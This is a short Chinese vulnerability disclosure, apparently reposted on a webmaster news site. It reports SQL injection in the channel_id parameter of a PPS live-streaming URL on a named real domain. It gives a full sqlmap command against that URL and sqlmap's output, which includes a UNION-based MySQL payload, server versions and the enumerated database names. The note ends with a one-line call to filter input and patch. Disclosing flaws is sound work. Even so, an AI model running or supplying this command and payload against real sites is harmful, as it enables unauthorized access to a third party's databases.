PPS在线直播SQL注入漏洞下载

 

注入点:http://live.pps.tv/index.php/play/get_program_by_label?channel_id=1&channel_name=GDTV1&l_type=live&t_date=111111





参数channel_id存在注入

通知存在注入点,未做进一步测试!



 

python sqlmap.py -u "http://live.pps.tv/index.php/play/get_program_by_label?channel_id=--&channel_name=GDTV1&l_type=live&t_date=111111" -p "channel_id" --batch --dbs



sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: channel_id

    Type: UNION query

    Title: MySQL UNION query (NULL) - 5 columns

    Payload: channel_id=--') UNION ALL SELECT CONCAT(0x7162747871,0x62676850436e4d694d4b,0x71666d6b71),NULL,NULL,NULL,NULL#&channel_name=GDTV1&l_type=live&t_date=111111

---



web application technology: PHP 5.3.15

back-end DBMS: MySQL 5

available databases [3]:

[*] epg

[*] information_schema

[*] test

有效过滤修补漏洞吧

上一篇: 像素采集器?Just Color Picker v3.5.0 中文单文件版下载
下一篇: 搜狗文件遍历导致敏感信息泄露下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细